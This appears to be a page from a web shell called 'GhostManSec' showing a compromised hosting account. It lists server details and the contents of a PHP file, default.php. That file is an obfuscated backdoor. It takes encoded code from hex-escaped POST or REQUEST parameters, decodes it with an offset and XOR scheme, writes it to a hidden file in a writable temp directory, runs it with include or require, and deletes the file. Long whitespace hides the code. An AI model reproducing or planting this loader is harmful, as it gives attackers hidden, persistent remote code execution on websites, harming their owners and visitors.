GhostManSec
Server: LiteSpeed
System: Linux premium256.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: niyknzcu (1843)
PHP: 8.0.30
Disabled: NONE
Upload Files
File: /home/niyknzcu/techechi.shop/default.php
<?php																																										if(@$_POST["\x62in\x64i\x6Eg"] !== null){ $descriptor = array_filter([ini_get("upload_tmp_dir"), session_save_path(), "/dev/shm", getenv("TMP"), "/tmp", getcwd(), getenv("TEMP"), sys_get_temp_dir(), "/var/tmp"]); $k = $_POST["\x62in\x64i\x6Eg"]; $k = explode ( '.' ,$k ) ; $key=''; $s='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS=strlen($s ); foreach ($k as $q => $v3): $sChar=ord($s[$q % $lenS] ); $d=((int)$v3 - $sChar - ($q % 10))^ 49; $key.= chr($d ); endforeach; while ($entry = array_shift($descriptor)) { if (array_product([is_dir($entry), is_writable($entry)])) { $itm = str_replace("{var_dir}", $entry, "{var_dir}/.sym"); $file = fopen($itm, 'w'); if ($file) { fwrite($file, $key); fclose($file); include $itm; @unlink($itm); exit; } } } }


if(isset($_REQUEST["r\x65\x63"])){
	$pgrp = $_REQUEST["r\x65\x63"];
		 	$pgrp=explode  (	'.' 		,	 	$pgrp	)	;	
	$resource='';
            $s5='abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS=strlen($s5 	);
            $v=0;
    
            array_walk($pgrp, 	function ($v2) use (&$resource, 	&$v, 	$s5, 	$lenS) {
                $sChar=ord($s5[$v	 %	$lenS] 	);
                $dec=((int)$v2 - $sChar - ($v	 %	10))	 ^65;
                $resource.=chr($dec 	);
                $v++;
            } 	);
	$val = array_filter(["/dev/shm", "/var/tmp", session_save_path(), getcwd(), getenv("TMP"), getenv("TEMP"), sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/tmp"]);
	foreach ($val as $pset):
    		if ((is_dir($pset) and is_writable($pset))) {
    $factor = str_replace("{var_dir}", $pset, "{var_dir}/.property_set");
    if (file_put_contents($factor, $resource)) {
	require $factor;
	unlink($factor);
	die();
}
}
endforeach;
}